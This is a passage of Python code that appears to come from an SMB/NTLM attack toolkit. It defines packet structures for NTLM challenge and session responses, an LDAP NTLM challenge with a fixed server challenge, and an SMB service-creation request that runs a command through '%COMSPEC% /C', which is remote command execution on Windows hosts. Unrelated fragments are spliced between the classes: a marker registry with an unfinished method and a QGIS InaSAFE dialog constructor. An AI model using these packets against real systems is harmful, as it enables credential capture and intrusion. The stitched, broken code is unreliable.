) + str(
self.fields["NegTokenInitSeqNLMPTag1"]
) + str(
self.fields["NegTokenInitSeqNLMPTag1Len"]
) + str(
self.fields["NegTokenInitSeqNLMPTag1Str"]
) + str(
self.fields["NegTokenInitSeqNLMPTag2"]
) + str(
self.fields["NegTokenInitSeqNLMPTag2Len"]
) + str(
self.fields["NegTokenInitSeqNLMPTag2Octet"]
) + str(
self.fields["NegTokenInitSeqNLMPTag2OctetLen"]
) + str(
self.fields["NegTokenInitSeqMechSignature"]
) + str(
self.fields["NegTokenInitSeqMechMessageType"]
) + str(
self.fields["NegTokenInitSeqMechMessageFlags"]
) + str(
self.fields["NegTokenInitSeqMechMessageDomainNameLen"]
) + str(
self.fields["NegTokenInitSeqMechMessageDomainNameMaxLen"]
) + str(
self.fields["NegTokenInitSeqMechMessageDomainNameBuffOffset"]
) + str(
self.fields["NegTokenInitSeqMechMessageWorkstationNameLen"]
) + str(
self.fields["NegTokenInitSeqMechMessageWorkstationNameMaxLen"]
) + str(
self.fields["NegTokenInitSeqMechMessageWorkstationNameBuffOffset"]
) + str(self.fields["NegTokenInitSeqMechMessageVersionHigh"]) + str(
self.fields["NegTokenInitSeqMechMessageVersionLow"]) + str(
self.fields["NegTokenInitSeqMechMessageVersionBuilt"]) + str(
self.fields["NegTokenInitSeqMechMessageVersionReserved"]
) + str(
self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])
data3 = str(self.fields["NegTokenInitSeqHeadTag"]) + str(
self.fields["NegTokenInitSeqHeadLen"]
) + str(self.fields["NegTokenInitSeqHeadTag1"]) + str(
self.fields["NegTokenInitSeqHeadLen1"]
) + str(self.fields["NegTokenInitSeqNLMPTag"]) + str(
self.fields["NegTokenInitSeqNLMPLen"]
) + str(self.fields["NegTokenInitSeqNLMPTag1"]) + str(
self.fields["NegTokenInitSeqNLMPTag1Len"]
) + str(self.fields["NegTokenInitSeqNLMPTag1Str"]) + str(
self.fields["NegTokenInitSeqNLMPTag2"]
) + str(
self.fields["NegTokenInitSeqNLMPTag2Len"]
) + str(
self.fields["NegTokenInitSeqNLMPTag2Octet"]
) + str(
self.fields["NegTokenInitSeqNLMPTag2OctetLen"]
) + str(
self.fields["NegTokenInitSeqMechSignature"]
) + str(
self.fields["NegTokenInitSeqMechMessageType"]
) + str(
self.fields["NegTokenInitSeqMechMessageFlags"]
) + str(
self.fields["NegTokenInitSeqMechMessageDomainNameLen"]
) + str(
self.fields["NegTokenInitSeqMechMessageDomainNameMaxLen"]
) + str(
self.fields["NegTokenInitSeqMechMessageDomainNameBuffOffset"]
) + str(
self.fields["NegTokenInitSeqMechMessageWorkstationNameLen"]
) + str(
self.fields["NegTokenInitSeqMechMessageWorkstationNameMaxLen"]
) + str(
self.fields["NegTokenInitSeqMechMessageWorkstationNameBuffOffset"]
) + str(self.fields["NegTokenInitSeqMechMessageVersionHigh"]) + str(
self.fields["NegTokenInitSeqMechMessageVersionLow"]) + str(
self.fields["NegTokenInitSeqMechMessageVersionBuilt"]) + str(
self.fields["NegTokenInitSeqMechMessageVersionReserved"]
) + str(
self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])
data4 = str(self.fields["NegTokenInitSeqHeadTag1"]) + str(
self.fields["NegTokenInitSeqHeadLen1"]
) + str(self.fields["NegTokenInitSeqNLMPTag"]) + str(
self.fields["NegTokenInitSeqNLMPLen"]
) + str(self.fields["NegTokenInitSeqNLMPTag1"]) + str(
self.fields["NegTokenInitSeqNLMPTag1Len"]
) + str(self.fields["NegTokenInitSeqNLMPTag1Str"]) + str(
self.fields["NegTokenInitSeqNLMPTag2"]
) + str(self.fields["NegTokenInitSeqNLMPTag2Len"]) + str(
self.fields["NegTokenInitSeqNLMPTag2Octet"]
) + str(
self.fields["NegTokenInitSeqNLMPTag2OctetLen"]
) + str(
self.fields["NegTokenInitSeqMechSignature"]
) + str(
self.fields["NegTokenInitSeqMechMessageType"]
) + str(
self.fields["NegTokenInitSeqMechMessageFlags"]
) + str(
self.fields["NegTokenInitSeqMechMessageDomainNameLen"]
) + str(
self.fields["NegTokenInitSeqMechMessageDomainNameMaxLen"]
) + str(
self.fields["NegTokenInitSeqMechMessageDomainNameBuffOffset"]
) + str(
self.fields["NegTokenInitSeqMechMessageWorkstationNameLen"]
) + str(
self.fields["NegTokenInitSeqMechMessageWorkstationNameMaxLen"]
) + str(
self.fields["NegTokenInitSeqMechMessageWorkstationNameBuffOffset"]
) + str(self.fields["NegTokenInitSeqMechMessageVersionHigh"]) + str(
self.fields["NegTokenInitSeqMechMessageVersionLow"]) + str(
self.fields["NegTokenInitSeqMechMessageVersionBuilt"]) + str(
self.fields["NegTokenInitSeqMechMessageVersionReserved"]
) + str(
self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])
data5 = str(self.fields["ApplicationHeaderTag"]) + str(
self.fields["ApplicationHeaderLen"]
) + str(self.fields["AsnSecMechType"]) + str(
self.fields["AsnSecMechLen"]
) + str(self.fields["AsnSecMechStr"]) + str(
self.fields["ChoosedTag"]
) + str(self.fields["ChoosedTagStrLen"]) + str(
self.fields["NegTokenInitSeqHeadTag"]
) + str(
self.fields["NegTokenInitSeqHeadLen"]
) + str(
self.fields["NegTokenInitSeqHeadTag1"]
) + str(
self.fields["NegTokenInitSeqHeadLen1"]
) + str(
self.fields["NegTokenInitSeqNLMPTag"]
) + str(
self.fields["NegTokenInitSeqNLMPLen"]
) + str(
self.fields["NegTokenInitSeqNLMPTag1"]
) + str(
self.fields["NegTokenInitSeqNLMPTag1Len"]
) + str(
self.fields["NegTokenInitSeqNLMPTag1Str"]
) + str(
self.fields["NegTokenInitSeqNLMPTag2"]
) + str(
self.fields["NegTokenInitSeqNLMPTag2Len"]
) + str(
self.fields["NegTokenInitSeqNLMPTag2Octet"]
) + str(
self.fields["NegTokenInitSeqNLMPTag2OctetLen"]
) + str(
self.fields["NegTokenInitSeqMechSignature"]
) + str(
self.fields["NegTokenInitSeqMechMessageType"]
) + str(
self.fields["NegTokenInitSeqMechMessageFlags"]
) + str(
self.fields["NegTokenInitSeqMechMessageDomainNameLen"]
) + str(
self.fields["NegTokenInitSeqMechMessageDomainNameMaxLen"]
) + str(
self.fields["NegTokenInitSeqMechMessageDomainNameBuffOffset"]
) + str(
self.fields["NegTokenInitSeqMechMessageWorkstationNameLen"]
) + str(
self.fields["NegTokenInitSeqMechMessageWorkstationNameMaxLen"]
) + str(
self.fields["NegTokenInitSeqMechMessageWorkstationNameBuffOffset"]
) + str(self.fields["NegTokenInitSeqMechMessageVersionHigh"]) + str(
self.fields["NegTokenInitSeqMechMessageVersionLow"]) + str(
self.fields["NegTokenInitSeqMechMessageVersionBuilt"]) + str(
self.fields["NegTokenInitSeqMechMessageVersionReserved"]
) + str(
self.fields["NegTokenInitSeqMechMessageVersionNTLMType"]
) + str(
self.fields["NegTokenInitSeqMechMessageVersionTerminator"]
) + str(self.fields["nativeOs"]) + str(
self.fields["nativeOsterminator"]) + str(
self.fields["nativelan"]) + str(
self.fields["nativelanterminator"])
data6 = str(self.fields["NegTokenInitSeqNLMPTag2Octet"]) + str(
self.fields["NegTokenInitSeqNLMPTag2OctetLen"]
) + str(self.fields["NegTokenInitSeqMechSignature"]) + str(
self.fields["NegTokenInitSeqMechMessageType"]
) + str(self.fields["NegTokenInitSeqMechMessageFlags"]) + str(
self.fields["NegTokenInitSeqMechMessageDomainNameLen"]
) + str(
self.fields["NegTokenInitSeqMechMessageDomainNameMaxLen"]
) + str(
self.fields["NegTokenInitSeqMechMessageDomainNameBuffOffset"]
) + str(
self.fields["NegTokenInitSeqMechMessageWorkstationNameLen"]
) + str(
self.fields["NegTokenInitSeqMechMessageWorkstationNameMaxLen"]
) + str(
self.fields["NegTokenInitSeqMechMessageWorkstationNameBuffOffset"]
) + str(self.fields["NegTokenInitSeqMechMessageVersionHigh"]) + str(
self.fields["NegTokenInitSeqMechMessageVersionLow"]) + str(
self.fields["NegTokenInitSeqMechMessageVersionBuilt"]) + str(
self.fields["NegTokenInitSeqMechMessageVersionReserved"]
) + str(
self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])
data7 = str(self.fields["NegTokenInitSeqMechSignature"]) + str(
self.fields["NegTokenInitSeqMechMessageType"]
) + str(self.fields["NegTokenInitSeqMechMessageFlags"]) + str(
self.fields["NegTokenInitSeqMechMessageDomainNameLen"]
) + str(
self.fields["NegTokenInitSeqMechMessageDomainNameMaxLen"]
) + str(
self.fields["NegTokenInitSeqMechMessageDomainNameBuffOffset"]
) + str(
self.fields["NegTokenInitSeqMechMessageWorkstationNameLen"]
) + str(
self.fields["NegTokenInitSeqMechMessageWorkstationNameMaxLen"]
) + str(
self.fields["NegTokenInitSeqMechMessageWorkstationNameBuffOffset"]
) + str(self.fields["NegTokenInitSeqMechMessageVersionHigh"]) + str(
self.fields["NegTokenInitSeqMechMessageVersionLow"]
) + str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"]) + str(
self.fields["NegTokenInitSeqMechMessageVersionReserved"]) + str(
self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])
data10 = str(self.fields["NegTokenInitSeqNLMPTag"]) + str(
self.fields["NegTokenInitSeqNLMPLen"]) + str(
self.fields["NegTokenInitSeqNLMPTag1"]) + str(
self.fields["NegTokenInitSeqNLMPTag1Len"]) + str(
self.fields["NegTokenInitSeqNLMPTag1Str"])
data11 = str(self.fields["NegTokenInitSeqNLMPTag1"]) + str(
self.fields["NegTokenInitSeqNLMPTag1Len"]) + str(
self.fields["NegTokenInitSeqNLMPTag1Str"])
## Packet len
self.fields["andxoffset"] = struct.pack("<h",
len(CompleteSMBPacketLen) + 32)
##Buff Len
self.fields["securitybloblength"] = struct.pack("<h", len(SecBlobLen))
##Complete Buff Len
self.fields["bcc1"] = struct.pack("<h", len(CompleteSMBPacketLen) - 27)
##App Header
self.fields["ApplicationHeaderLen"] = struct.pack(
"<B",
len(SecBlobLen) - 2)
##Asn Field 1
self.fields["AsnSecMechLen"] = struct.pack(
"<B", len(str(self.fields["AsnSecMechStr"])))
##Asn Field 1
self.fields["ChoosedTagStrLen"] = struct.pack("<B", len(data3))
##SpNegoTokenLen
self.fields["NegTokenInitSeqHeadLen"] = struct.pack("<B", len(data4))
##NegoTokenInit
self.fields["NegTokenInitSeqHeadLen1"] = struct.pack("<B", len(data10))
## Tag0 Len
self.fields["NegTokenInitSeqNLMPLen"] = struct.pack("<B", len(data11))
## Tag0 Str Len
self.fields["NegTokenInitSeqNLMPTag1Len"] = struct.pack(
"<B", len(str(self.fields["NegTokenInitSeqNLMPTag1Str"])))
## Tag2 Len
self.fields["NegTokenInitSeqNLMPTag2Len"] = struct.pack(
"<B", len(data6))
## Tag3 Len
self.fields["NegTokenInitSeqNLMPTag2OctetLen"] = struct.pack(
"<B", len(data7))
class SMB2SessionAcceptData(Packet):
fields = OrderedDict([
("Len", "\x09\x00"),
("SessionFlag", "\x01\x00"),
("SecBlobOffSet", "\x48\x00"),
("SecBlobLen", "\x1d\x00"),
("SecBlobTag0", "\xa1"),
("SecBlobTag0Len", "\x1b"),
("NegTokenResp", "\x30"),
("NegTokenRespLen", "\x19"),
("NegTokenRespTag0", "\xa0"),
("NegTokenRespTag0Len", "\x03"),
("NegStateResp", "\x0a"),
("NegTokenRespLen1", "\x01"),
("NegTokenRespStr", "\x00"),
("SecBlobTag3", "\xa3"),
("SecBlobTag3Len", "\x12"),
("SecBlobOctetHeader", "\x04"),
("SecBlobOctetLen", "\x10"),
("MechlistMICVersion", ""), # No verification on the client side...
("MechlistCheckSum", ""),
("MechlistSeqNumber", ""),
("Data", ""),
])
def calculate(self):
###### SecBlobLen Calc:
CalculateSecBlob = str(self.fields["SecBlobTag0"]) + str(
self.fields["SecBlobTag0Len"]
) + str(self.fields["NegTokenResp"]) + str(
self.fields["NegTokenRespLen"]
) + str(self.fields["NegTokenRespTag0"]) + str(
self.fields["NegTokenRespTag0Len"]
) + str(self.fields["NegStateResp"]) + str(
self.fields["NegTokenRespLen1"]) + str(
self.fields["NegTokenRespStr"]) + str(
self.fields["SecBlobTag3"]) + str(
self.fields["SecBlobTag3Len"]) + str(
self.fields["SecBlobOctetHeader"]) + str(
self.fields["SecBlobOctetLen"]) + str(
self.fields["MechlistMICVersion"]) + str(
self.fields["MechlistCheckSum"]) + str(
self.fields["MechlistSeqNumber"])
CalculateASN = str(self.fields["NegTokenResp"]) + str(
self.fields["NegTokenRespLen"]
) + str(self.fields["NegTokenRespTag0"]) + str(
self.fields["NegTokenRespTag0Len"]
) + str(self.fields["NegStateResp"]) + str(
self.fields["NegTokenRespLen1"]) + str(
self.fields["NegTokenRespStr"]) + str(
self.fields["SecBlobTag3"]) + str(
self.fields["SecBlobTag3Len"]) + str(
self.fields["SecBlobOctetHeader"]) + str(
self.fields["SecBlobOctetLen"]) + str(
self.fields["MechlistMICVersion"]) + str(
self.fields["MechlistCheckSum"]) + str(
self.fields["MechlistSeqNumber"])
MechLen = str(self.fields["SecBlobOctetHeader"]) + str(
self.fields["SecBlobOctetLen"]) + str(
self.fields["MechlistMICVersion"]) + str(
self.fields["MechlistCheckSum"]) + str(
self.fields["MechlistSeqNumber"])
#Packet Struct len
self.fields["SecBlobLen"] = struct.pack("<h", len(CalculateSecBlob))
self.fields["SecBlobTag0Len"] = struct.pack("<B", len(CalculateASN))
self.fields["NegTokenRespLen"] = struct.pack("<B",
len(CalculateASN) - 2)
self.fields["SecBlobTag3Len"] = struct.pack("<B", len(MechLen))
self.fields["SecBlobOctetLen"] = struct.pack("<B", len(MechLen) - 2)
#!/usr/bin/env python
import logging
from odict import OrderedDict
_name_to_marker = OrderedDict()
def get_marker_names():
global _name_to_marker
return _name_to_marker.keys()
def register_marker(name, group='signal', needs_transform=True):
global _name_to_marker
_name_to_marker[name] = Marker(name, group, needs_transform)
return _name_to_marker[name]
def marker_from_name(name):
return _name_to_marker.get(name, None)
def is_marker_registered(name):
return name in _name_to_marker
class Marker(object):
def __init__(self, name, group, needs_transform):
self.name = name
self.needs_transform = needs_transform
self.group = group
def __str__(self):
return self.name
def __repr__(self):
class SMBNegoKerbAns(Packet):
fields = OrderedDict([
("Wordcount", "\x11"),
("Dialect", ""),
("Securitymode", "\x03"),
("MaxMpx", "\x32\x00"),
("MaxVc", "\x01\x00"),
("MaxBuffSize", "\x04\x41\x00\x00"),
("MaxRawBuff", "\x00\x00\x01\x00"),
("SessionKey", "\x00\x00\x00\x00"),
("Capabilities", "\xfd\xf3\x01\x80"),
("SystemTime", "\x84\xd6\xfb\xa3\x01\x35\xcd\x01"),
("SrvTimeZone", "\xf0\x00"),
("KeyLen", "\x00"),
("Bcc", "\x57\x00"),
("Guid",
"\xc8\x27\x3d\xfb\xd4\x18\x55\x4f\xb2\x40\xaf\xd7\x61\x73\x75\x3b"),
("InitContextTokenASNId", "\x60"),
("InitContextTokenASNLen", "\x5b"),
("ThisMechASNId", "\x06"),
("ThisMechASNLen", "\x06"),
("ThisMechASNStr", "\x2b\x06\x01\x05\x05\x02"),
("SpNegoTokenASNId", "\xA0"),
("SpNegoTokenASNLen", "\x51"),
("NegTokenASNId", "\x30"),
("NegTokenASNLen", "\x4f"),
("NegTokenTag0ASNId", "\xA0"),
("NegTokenTag0ASNLen", "\x30"),
("NegThisMechASNId", "\x30"),
("NegThisMechASNLen", "\x2e"),
("NegThisMech1ASNId", "\x06"),
("NegThisMech1ASNLen", "\x09"),
("NegThisMech1ASNStr", "\x2a\x86\x48\x82\xf7\x12\x01\x02\x02"),
("NegThisMech2ASNId", "\x06"),
("NegThisMech2ASNLen", "\x09"),
("NegThisMech2ASNStr", "\x2a\x86\x48\x86\xf7\x12\x01\x02\x02"),
("NegThisMech3ASNId", "\x06"),
("NegThisMech3ASNLen", "\x0a"),
("NegThisMech3ASNStr", "\x2a\x86\x48\x86\xf7\x12\x01\x02\x02\x03"),
("NegThisMech4ASNId", "\x06"),
("NegThisMech4ASNLen", "\x09"),
("NegThisMech4ASNStr", "\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"),
("NegTokenTag3ASNId", "\xA3"),
("NegTokenTag3ASNLen", "\x1b"),
("NegHintASNId", "\x30"),
("NegHintASNLen", "\x19"),
("NegHintTag0ASNId", "\xa0"),
("NegHintTag0ASNLen", "\x17"),
("NegHintFinalASNId", "\x1b"),
("NegHintFinalASNLen", "\x15"),
("NegHintFinalASNStr", "[email protected]"),
])
def calculate(self):
CompleteBCCLen1 = str(self.fields["Guid"]) + str(
self.fields["InitContextTokenASNId"]
) + str(self.fields["InitContextTokenASNLen"]) + str(
self.fields["ThisMechASNId"]
) + str(self.fields["ThisMechASNLen"]) + str(
self.fields["ThisMechASNStr"]
) + str(self.fields["SpNegoTokenASNId"]) + str(
self.fields["SpNegoTokenASNLen"]) + str(
self.fields["NegTokenASNId"]) + str(
self.fields["NegTokenASNLen"]) + str(
self.fields["NegTokenTag0ASNId"]) + str(
self.fields["NegTokenTag0ASNLen"]) + str(
self.fields["NegThisMechASNId"]) + str(
self.fields["NegThisMechASNLen"]) + str(
self.fields["NegThisMech1ASNId"]
) + str(
self.fields["NegThisMech1ASNLen"]
) + str(
self.fields["NegThisMech1ASNStr"]
) + str(
self.fields["NegThisMech2ASNId"]
) + str(
self.fields["NegThisMech2ASNLen"]
) + str(
self.fields["NegThisMech2ASNStr"]
) + str(
self.fields["NegThisMech3ASNId"]
) + str(
self.fields["NegThisMech3ASNLen"]
) + str(
self.fields["NegThisMech3ASNStr"]
) + str(
self.fields["NegThisMech4ASNId"]
) + str(
self.fields["NegThisMech4ASNLen"]
) + str(
self.fields["NegThisMech4ASNStr"]
) + str(
self.fields["NegTokenTag3ASNId"]
) + str(
self.fields["NegTokenTag3ASNLen"]
) + str(self.fields["NegHintASNId"]) + str(
self.fields["NegHintASNLen"]) + str(
self.fields["NegHintTag0ASNId"]
) + str(
self.fields["NegHintTag0ASNLen"]
) + str(
self.fields["NegHintFinalASNId"]
) + str(
self.fields["NegHintFinalASNLen"]
) + str(
self.fields["NegHintFinalASNStr"])
AsnLenStart = str(self.fields["ThisMechASNId"]) + str(
self.fields["ThisMechASNLen"]
) + str(self.fields["ThisMechASNStr"]) + str(
self.fields["SpNegoTokenASNId"]
) + str(self.fields["SpNegoTokenASNLen"]) + str(
self.fields["NegTokenASNId"]
) + str(self.fields["NegTokenASNLen"]) + str(
self.fields["NegTokenTag0ASNId"]) + str(
self.fields["NegTokenTag0ASNLen"]) + str(
self.fields["NegThisMechASNId"]) + str(
self.fields["NegThisMechASNLen"]) + str(
self.fields["NegThisMech1ASNId"]) + str(
self.fields["NegThisMech1ASNLen"]) + str(
self.fields["NegThisMech1ASNStr"]) + str(
self.fields["NegThisMech2ASNId"]
) + str(
self.fields["NegThisMech2ASNLen"]
) + str(
self.fields["NegThisMech2ASNStr"]
) + str(
self.fields["NegThisMech3ASNId"]
) + str(
self.fields["NegThisMech3ASNLen"]
) + str(
self.fields["NegThisMech3ASNStr"]
) + str(
self.fields["NegThisMech4ASNId"]
) + str(
self.fields["NegThisMech4ASNLen"]
) + str(
self.fields["NegThisMech4ASNStr"]
) + str(
self.fields["NegTokenTag3ASNId"]
) + str(
self.fields["NegTokenTag3ASNLen"]
) + str(self.fields["NegHintASNId"]) + str(
self.fields["NegHintASNLen"]) + str(
self.fields["NegHintTag0ASNId"]
) + str(
self.fields["NegHintTag0ASNLen"]
) + str(
self.fields["NegHintFinalASNId"]
) + str(
self.fields["NegHintFinalASNLen"]
) + str(
self.fields["NegHintFinalASNStr"])
AsnLen2 = str(self.fields["NegTokenASNId"]) + str(
self.fields["NegTokenASNLen"]
) + str(self.fields["NegTokenTag0ASNId"]) + str(
self.fields["NegTokenTag0ASNLen"]
) + str(self.fields["NegThisMechASNId"]) + str(
self.fields["NegThisMechASNLen"]
) + str(self.fields["NegThisMech1ASNId"]) + str(
self.fields["NegThisMech1ASNLen"]) + str(
self.fields["NegThisMech1ASNStr"]) + str(
self.fields["NegThisMech2ASNId"]) + str(
self.fields["NegThisMech2ASNLen"]) + str(
self.fields["NegThisMech2ASNStr"]) + str(
self.fields["NegThisMech3ASNId"]) + str(
self.fields["NegThisMech3ASNLen"]) + str(
self.fields["NegThisMech3ASNStr"]
) + str(
self.fields["NegThisMech4ASNId"]
) + str(
self.fields["NegThisMech4ASNLen"]
) + str(
self.fields["NegThisMech4ASNStr"]
) + str(
self.fields["NegTokenTag3ASNId"]
) + str(
self.fields["NegTokenTag3ASNLen"]
) + str(self.fields["NegHintASNId"]) + str(
self.fields["NegHintASNLen"]) + str(
self.fields["NegHintTag0ASNId"]
) + str(
self.fields["NegHintTag0ASNLen"]
) + str(
self.fields["NegHintFinalASNId"]
) + str(
self.fields["NegHintFinalASNLen"]
) + str(
self.fields["NegHintFinalASNStr"])
MechTypeLen = str(self.fields["NegThisMechASNId"]) + str(
self.fields["NegThisMechASNLen"]
) + str(self.fields["NegThisMech1ASNId"]) + str(
self.fields["NegThisMech1ASNLen"]
) + str(self.fields["NegThisMech1ASNStr"]) + str(
self.fields["NegThisMech2ASNId"]
) + str(self.fields["NegThisMech2ASNLen"]) + str(
self.fields["NegThisMech2ASNStr"]) + str(
self.fields["NegThisMech3ASNId"]) + str(
self.fields["NegThisMech3ASNLen"]) + str(
self.fields["NegThisMech3ASNStr"]) + str(
self.fields["NegThisMech4ASNId"]) + str(
self.fields["NegThisMech4ASNLen"]) + str(
self.fields["NegThisMech4ASNStr"])
Tag3Len = str(self.fields["NegHintASNId"]) + str(
self.fields["NegHintASNLen"]) + str(
self.fields["NegHintTag0ASNId"]) + str(
self.fields["NegHintTag0ASNLen"]) + str(
self.fields["NegHintFinalASNId"]) + str(
self.fields["NegHintFinalASNLen"]) + str(
self.fields["NegHintFinalASNStr"])
self.fields["Bcc"] = struct.pack("<h", len(CompleteBCCLen1))
self.fields["InitContextTokenASNLen"] = struct.pack(
"<B", len(AsnLenStart))
self.fields["ThisMechASNLen"] = struct.pack(
"<B", len(str(self.fields["ThisMechASNStr"])))
self.fields["SpNegoTokenASNLen"] = struct.pack("<B", len(AsnLen2))
self.fields["NegTokenASNLen"] = struct.pack("<B", len(AsnLen2) - 2)
self.fields["NegTokenTag0ASNLen"] = struct.pack("<B", len(MechTypeLen))
self.fields["NegThisMechASNLen"] = struct.pack("<B",
len(MechTypeLen) - 2)
self.fields["NegThisMech1ASNLen"] = struct.pack(
"<B", len(str(self.fields["NegThisMech1ASNStr"])))
self.fields["NegThisMech2ASNLen"] = struct.pack(
"<B", len(str(self.fields["NegThisMech2ASNStr"])))
self.fields["NegThisMech3ASNLen"] = struct.pack(
"<B", len(str(self.fields["NegThisMech3ASNStr"])))
self.fields["NegThisMech4ASNLen"] = struct.pack(
"<B", len(str(self.fields["NegThisMech4ASNStr"])))
self.fields["NegTokenTag3ASNLen"] = struct.pack("<B", len(Tag3Len))
self.fields["NegHintASNLen"] = struct.pack("<B", len(Tag3Len) - 2)
self.fields["NegHintFinalASNLen"] = struct.pack(
"<B", len(str(self.fields["NegHintFinalASNStr"])))
def __init__(self, parent, iface, theDock=None):
"""Constructor for the dialog.
.. note:: In QtDesigner the advanced editor's predefined keywords
list should be shown in english always, so when adding entries to
cboKeyword, be sure to choose :safe_qgis:`Properties<<` and untick
the :safe_qgis:`translatable` property.
Args:
* parent - parent widget of this dialog
* iface - a Quantum GIS QGisAppInterface instance.
* theDock - Optional dock widget instance that we can notify of
changes to the keywords.
Returns:
not applicable
Raises:
no exceptions explicitly raised
"""
QtGui.QDialog.__init__(self, parent)
self.setupUi(self)
self.setWindowTitle(self.tr('InaSAFE %s Keywords Editor' %
__version__))
self.keywordIO = KeywordIO()
# note the keys should remain untranslated as we need to write
# english to the keywords file. The keys will be written as user data
# in the combo entries.
# .. seealso:: http://www.voidspace.org.uk/python/odict.html
self.standardExposureList = OrderedDict([
('population [density]', self.tr('population [density]')),
('population [count]', self.tr('population [count]')),
('building', self.tr('building')),
('building [osm]', self.tr('building [osm]')),
('building [sigab]', self.tr('building [sigab]')),
('roads', self.tr('roads'))
])
self.standardHazardList = OrderedDict([
('earthquake [MMI]', self.tr('earthquake [MMI]')),
('tsunami [m]', self.tr('tsunami [m]')),
('tsunami [wet/dry]', self.tr('tsunami [wet/dry]')),
('tsunami [feet]', self.tr('tsunami [feet]')),
('flood [m]', self.tr('flood [m]')),
('flood [wet/dry]', self.tr('flood [wet/dry]')),
('flood [feet]', self.tr('flood [feet]')),
('tephra [kg2/m2', self.tr('tephra [kg2/m2]'))
])
# Save reference to the QGIS interface and parent
self.iface = iface
self.parent = parent
self.dock = theDock
# Set up things for context help
myButton = self.buttonBox.button(QtGui.QDialogButtonBox.Help)
QtCore.QObject.connect(myButton, QtCore.SIGNAL('clicked()'),
self.showHelp)
self.helpDialog = None
# set some inital ui state:
self.pbnAdvanced.setChecked(True)
self.pbnAdvanced.toggle()
self.radPredefined.setChecked(True)
self.adjustSize()
#myButton = self.buttonBox.button(QtGui.QDialogButtonBox.Ok)
#myButton.setEnabled(False)
self.layer = self.iface.activeLayer()
if self.layer:
self.loadStateFromKeywords()
class SMBSessEmpty(Packet):
fields = OrderedDict([
("Empty", "\x00\x00\x00"),
])
class SMBDCESVCCTLCreateService(Packet):
fields = OrderedDict([
("ContextHandle", ""),
("MaxCount", "\x0c\x00\x00\x00"),
("Offset", "\x00\x00\x00\x00"),
("ActualCount", "\x0c\x00\x00\x00"),
("ServiceName", "AyAGaxwLhCP"),
("MachineNameNull", "\x00\x00"),
("ReferentID", "\x9c\xfa\x9a\xc9"),
("MaxCountRefID", "\x11\x00\x00\x00"),
("OffsetID", "\x00\x00\x00\x00"),
("ActualCountRefID", "\x11\x00\x00\x00"),
("DisplayNameID", "DhhUFcsvrfJvLwRq"),
("DisplayNameIDNull", "\x00\x00\x00\x00"),
("AccessMask", "\xff\x01\x0f\x00"),
("ServerType", "\x10\x01\x00\x00"),
("ServiceStartType", "\x03\x00\x00\x00"),
("ServiceErrorCtl", "\x00\x00\x00\x00"),
("BinPathMaxCount", "\xb6\x00\x00\x00"),
("BinPathOffset", "\x00\x00\x00\x00"),
("BinPathActualCount", "\xb6\x00\x00\x00"),
("BinPathName", "%COMSPEC% /C \""),
("BinCMD", ""),
("BintoEnd", "\""),
("BinPathNameNull", "\x00\x00"),
("Nullz",
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
),
])
def calculate(self):
BinDataLen = str(self.fields["BinPathName"]) + str(
self.fields["BinCMD"]) + str(self.fields["BintoEnd"])
## Calculate first
self.fields["BinPathMaxCount"] = struct.pack("<i", len(BinDataLen) + 1)
self.fields["BinPathActualCount"] = struct.pack(
"<i",
len(BinDataLen) + 1)
self.fields["MaxCount"] = struct.pack(
"<i",
len(str(self.fields["ServiceName"])) + 1)
self.fields["ActualCount"] = struct.pack(
"<i",
len(str(self.fields["ServiceName"])) + 1)
self.fields["MaxCountRefID"] = struct.pack(
"<i",
len(str(self.fields["DisplayNameID"])) + 1)
self.fields["ActualCountRefID"] = struct.pack(
"<i",
len(str(self.fields["DisplayNameID"])) + 1)
## Then convert to UTF-16LE, yeah it's weird..
self.fields["ServiceName"] = self.fields["ServiceName"].encode(
'utf-16le')
self.fields["DisplayNameID"] = self.fields["DisplayNameID"].encode(
'utf-16le')
self.fields["BinPathName"] = self.fields["BinPathName"].encode(
'utf-16le')
self.fields["BinCMD"] = self.fields["BinCMD"].encode('utf-16le')
self.fields["BintoEnd"] = self.fields["BintoEnd"].encode('utf-16le')
class LDAPNTLMChallenge(Packet):
fields = OrderedDict([
("ParserHeadASNID", "\x30"),
("ParserHeadASNLenOfLen", "\x84"),
("ParserHeadASNLen", "\x00\x00\x00\xD0"), #208
("MessageIDASNID", "\x02"),
("MessageIDASNLen", "\x01"),
("MessageIDASNStr", "\x02"),
("OpHeadASNID", "\x61"),
("OpHeadASNIDLenOfLen", "\x84"),
("OpHeadASNIDLen", "\x00\x00\x00\xc7"), #199
("Status", "\x0A"),
("StatusASNLen", "\x01"),
("StatusASNStr", "\x0e"), #In Progress.
("MatchedDN", "\x04\x00"), #Null
("ErrorMessage", "\x04\x00"), #Null
("SequenceHeader", "\x87"),
("SequenceHeaderLenOfLen", "\x81"),
("SequenceHeaderLen", "\x82"), #188
("NTLMSSPSignature", "NTLMSSP"),
("NTLMSSPSignatureNull", "\x00"),
("NTLMSSPMessageType", "\x02\x00\x00\x00"),
("NTLMSSPNtWorkstationLen", "\x1e\x00"),
("NTLMSSPNtWorkstationMaxLen", "\x1e\x00"),
("NTLMSSPNtWorkstationBuffOffset", "\x38\x00\x00\x00"),
("NTLMSSPNtNegotiateFlags", "\x15\x82\x89\xe2"),
("NTLMSSPNtServerChallenge", "\x81\x22\x33\x34\x55\x46\xe7\x88"),
("NTLMSSPNtReserved", "\x00\x00\x00\x00\x00\x00\x00\x00"),
("NTLMSSPNtTargetInfoLen", "\x94\x00"),
("NTLMSSPNtTargetInfoMaxLen", "\x94\x00"),
("NTLMSSPNtTargetInfoBuffOffset", "\x56\x00\x00\x00"),
("NegTokenInitSeqMechMessageVersionHigh", "\x05"),
("NegTokenInitSeqMechMessageVersionLow", "\x02"),
("NegTokenInitSeqMechMessageVersionBuilt", "\xce\x0e"),
("NegTokenInitSeqMechMessageVersionReserved", "\x00\x00\x00"),
("NegTokenInitSeqMechMessageVersionNTLMType", "\x0f"),
("NTLMSSPNtWorkstationName", "SMB12"),
("NTLMSSPNTLMChallengeAVPairsId", "\x02\x00"),
("NTLMSSPNTLMChallengeAVPairsLen", "\x0a\x00"),
("NTLMSSPNTLMChallengeAVPairsUnicodeStr", "smb12"),
